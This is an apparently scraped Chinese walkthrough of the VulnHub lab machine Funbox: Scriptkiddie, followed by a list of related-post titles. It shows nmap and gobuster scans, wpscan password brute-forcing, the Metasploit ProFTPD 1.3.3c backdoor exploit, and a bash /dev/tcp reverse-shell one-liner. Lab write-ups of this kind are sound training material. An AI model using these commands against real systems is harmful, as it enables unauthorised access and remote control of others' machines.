靶机介绍

Difficult: As always, it’s a very easy box for beginners.

Goal: Get flag

Download:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/

信息探测

主机发现

netdiscover -i eth0 -r 192.168.0.128/24

端口扫描

nmap -sV -p- -A 192.168.0.131

nmap扫描结果

  • 并不能用 anonymous 访问FTP服务,这里就不进行FTP的暴力破解了;
  • 网站是用WordPress搭建的,可以使用wpscan进行检测,可以进行用户名和密码的枚举

添加hosts

由于靶机作者提示了 Add to your /etc/hosts: funbox11,因此将内容添加至hosts文件中

目录扫描

gobuster dir -u http://funbox11/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "php,txt,zip,html" -t 200

获取网站Webshell

访问网站主页

使用wpscan 进行用户名和密码的枚举

枚举用户名

wpscan --url http://funbox11/ --enumerate u

枚举密码

wpscan --url http://funbox11/ --passwords /usr/share/wordlists/rockyou.txt --usernames admin -t 5

时间有点久,也可能爆破不出来,就不爆破了

ProFTPD 1.3.3c 后门命令执行漏洞

在端口扫描中可以得知FTP 服务使用的版本是 ProFTPD 1.3.3c,这个版本存在命令执行漏洞,在kali中寻找exp

searchsploit proftpd

有一个metasploit版本的exp

metasploit执行漏洞

use exploit/unix/ftp/proftpd_133c_backdoor
show options
set RHOSTS 192.168.0.131
show payloads
set payload payload/cmd/unix/reverse
show options
set LHOST 192.168.0.128
exploit

得到的是一个root权限,在这里可以直接得到flag,也可以通过执行一个反弹shell来得到一个连接

执行反弹shell

开启一个监听

在metasploit中执行

bash -c 'bash -i >& /dev/tcp/192.168.0.128/9001 0>&1'

得到连接

得到flag

总结

  • nmap扫描
  • wpscan
  • ProFTPD-1.3.3c 漏洞

vulnhub--Funbox: Scriptkiddie相关推荐

  1. 靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie

    一.环境搭建 靶官网机下载地址:Funbox: Scriptkiddie ~ VulnHub 百度云盘下载链接: 百度网盘 请输入提取码 提取码: i4a9 二.信息收集 1.nmap命令扫描靶机 先 ...

  2. vulnhub Funbox: 1

    渗透思路: nmap扫描----wpscan爆破网站用户名和密码----joe用户ssh登录并绕过rbash----文件权限777定时任务提权(多个用户定时任务执行同一个文件) 环境信息: 靶机:19 ...

  3. vulnhub Funbox: Under Construction

    环境搭建: Funbox: Under Construction! ~ VulnHub 漏洞复现: 探测靶机的IP地址 nmap进行探测靶机的服务和端口 访问80端口 dirb扫描目录,发现catal ...

  4. VulnHub FunBox Writeup

    FunBox详情请见:https://www.vulnhub.com/entry/funbox-1,518/ 靶机使用VirtualBox搭建,连接VirtualBox Host-Only网卡,IP为 ...

  5. 靶机渗透练习25-Funbox4-CTF

    靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-ctf,546/ Description Groundhog Day: Boot2Root ! Initi ...

  6. 【每日打靶练习】vulnhub靶机平台--Funbox2(低)

    Funbox靶场练习--低 0x00部署 0x01信息收集 1.主机发现 2.端口扫描 3.信息收集 0x03漏洞挖掘 1.FTP服务漏洞 2.密码爆破(john) 3.SSH公钥认证 4.rbash ...

  7. 看完这篇 教你玩转渗透测试靶机vulnhub——FunBox4(CTF)

    Vulnhub靶机FunBox4(CTF)渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:文件上传 Get ...

  8. 看完这篇 教你玩转渗透测试靶机vulnhub——FunBox3(Easy)

    Vulnhub靶机FunBox3(Easy)渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:网站渗透Get ...

  9. 看完这篇 教你玩转渗透测试靶机vulnhub——FunBox10(Under Construction)

    Vulnhub靶机FunBox10(Under Construction)渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①: ...

  10. 看完这篇 教你玩转渗透测试靶机vulnhub——FunBox7( EASYENUM)

    Vulnhub靶机FunBox7(EASYENUM)渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:文件上 ...

最新文章

  1. encodeURIComponent或者encodeURI 不用行不行?
  2. 什么是方向图乘积定理_课本上没有,但十分好用的初中数学定理公式
  3. python和docker交互_jupyter notebook 连接服务器docker中python环境
  4. java程序员闯关题网站_Java程序员每周必逛的十大学习网站
  5. 在bash脚本中进行浮点运算
  6. oracle 性能优化 常用,Oracle數據庫常用性能優化
  7. Python3 数据库连接
  8. php生成excel范例,支持任意行列
  9. rel=alternate stylesheet属性
  10. macOS Big Sur新增小组件介绍
  11. 【聚沙成塔】将Mon Jun 01 2020 00:00:00 GMT+0800 (中国标准时间) 转换为 2020-06
  12. bigemap如何添加第三方地图
  13. markDown 下载安装教程
  14. python空气质量指数计算_Python的学习笔记案例8--空气质量指数计算5.0
  15. 【好工具】安利一款优秀的图片浏览器
  16. 在最熟知的芯片,解析最不为人知的秘密--Nordic的蓝牙芯片nRF52832。
  17. 基于bibtex的文献管理(详细)
  18. 云计算面临的安全威胁,主要来自于哪几个方面?
  19. 移动接入及核心网与移动回传网无信息交互,造成资源浪费
  20. 网络安全——应急响应之入侵排查

热门文章

  1. 剪刀石头布(自留底)01
  2. HTB-Blocky
  3. [BZOJ1233][Usaco2009Open]干草堆tower(单调队列优化)
  4. 使用D2D出现的错误
  5. 非常实用的九个程序员工具网站
  6. 数据库事务和范式理解
  7. 论文简介:Extract Line Art from Illustrations
  8. 补天发动 3万多名白帽子找漏洞情报,这次有什么不一样
  9. html用if函数,if函数怎么用的实例
  10. 这个 api 管理工具悄悄开源了,快来看看